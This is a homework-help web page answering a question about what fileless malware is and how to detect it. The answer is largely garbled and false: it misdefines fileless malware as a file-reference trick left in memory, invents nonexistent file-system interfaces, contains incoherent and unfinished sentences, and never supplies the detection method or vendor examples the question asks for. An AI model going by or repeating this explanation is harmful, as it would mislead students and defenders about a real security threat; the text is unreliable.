StudyDaddy Information Systems What is fileless malware? What are some techniques for detecting it and protecting against it? Please provide a detailed description of fileless malware, a method for detecting it and at least 2 vendo

What is fileless malware? What are some techniques for detecting it and protecting against it? Please provide a detailed description of fileless malware, a method for detecting it and at least 2 vendo

Fileless malware is malware that is downloaded and removed due to user actions. The downloader, instead of deleting the file, leaves a reference to the file in memory, which causes the computer to believe that the file exists. Once the computer runs the referenced file, it thinks that it is still there. The computer will download the file again and install it if it does not click on an alternative. Fileless malware is malware that does not execute a file but instead attempts to intercept and modify an event. A file has all of the file system functionality: A complete file name that contains a hexadecimal string, and the System.IO.Directory. Enumeration and System. String Enumeration interfaces. Fileless malware also ignores these interfaces (Khushali, 2020).

The example below enumerates the file system support and reacts to the support. The author was able to obtain the file system configuration by going to device settings by sharing the credentials. If the attacker did not share the credentials, they could enumerate the file system because the attacker can enumerate every file and try to open it with the native file system. Note that if the attacker logged into another computer.  It is up to the application or the OS to return a readable and writable file system. The malware is resilient to renaming: No renaming behavior embedded in the malware even if the malware uses file extensions such as .exe or .com to alias file names. The malware also bypasses the FAT flag to be able to access the system drive. During execution, the malware creates directories, if necessary, that the victim can trust and can be mounted later.

There is much traditional malware that tries to do something smart, like modifying the registry and creating a new process. While this kind of malware can be annoying and confusing for the end-user, file-less malware creates different behaviors. For example, an attacker could potentially replace the kernel, which could allow the threat to communicate back to the C&C server and could result in potential out-of-band execution of code. In the threat scenario, the attacker would potentially use an ASLR-based exploit, the DOUBLEPULSAR exploit, or TETRA Miner (Xiong et al., 2020).

References

Khushali, V (2020). A Review on Fileless Malware Analysis Techniques.

Xiong, C., Zhu, T., Dong, W., Ruan, L., Yang, R., Chen, Y., ... & Chen, X. (2020). CONAN: A Practical Real-time APT Detection System with High Accuracy and Efficiency. IEEE Transactions on Dependable and Secure Computing.

Have a similar question?

Continue to edit or attach image(s).

  • Fast and convenient

    Fast and convenient

    Simply post your question and get it answered by professional tutor within 30 minutes. It's as simple as that!

  • Any topic, any difficulty

    Any topic, any difficulty

    We've got thousands of tutors in different areas of study who are willing to help you with any kind of academic assignment, be it a math homework or an article.

  • 100% Satisfied Students

    100% Satisfied Students

    Join 3,4 million+ members who are already getting homework help from StudyDaddy!